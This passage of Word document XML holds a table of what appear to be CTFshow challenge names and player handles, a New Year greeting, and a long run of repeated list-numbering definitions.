            <w:tcW w:w="22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crypto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月月的爱情故事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mumu666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麻辣兔头又一锅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萌新阿狸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NOeasyRSA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mumu666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sign_rand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lingfeng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哪位师傅知道这个是什么密码啊?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春哥</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22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re_signin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h1xa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cpp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ThTsOd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22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四国军棋_套神注册码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ThTsOd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CTFshow全体祝愿师傅们 新年快乐，阖家幸福！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我们下次比赛再见！</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:footerReference w:type="default" r:id="rId3"/>
      <w:headerReference w:type="default" r:id="rId3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88501">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288502">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288503">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288504">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288505">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288506">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288507">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288508">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288509">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288510">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288511">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288512">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288513">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288514">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288515">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288516">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288517">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288518">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288519">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288520">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288521">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288522">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288523">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288524">
    <w:lvl>
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288525">
    <w:lvl>
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288526">
    <w:lvl>
      <w:start w:val="3"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288527">
    <w:lvl>
      <w:start w:val="4"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288528">
    <w:lvl>
      <w:start w:val="5"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288529">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288530">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288531">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288532">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288533">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288534">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288535">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288536">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288537">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288538">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288539">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288540">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288541">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288542">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288543">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288544">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288545">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288546">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288547">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288548">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288549">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288550">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288551">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288552">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288553">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288554">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288555">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288556">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288557">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288558">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288559">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288560">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288561">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288562">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288563">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288564">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288565">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288566">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="￮"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288567">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="￮"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288568">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="￮"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288569">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288570">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288571">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288572">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288573">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288574">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288575">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288576">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288577">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288578">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288579">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288580">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288581">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288582">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288583">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288584">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288585">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288586">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288587">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288588">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288589">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288590">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288591">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288592">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288593">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288594">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288595">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288596">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288597">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288598">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288599">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288600">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288601">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288602">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288603">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288604">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288605">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
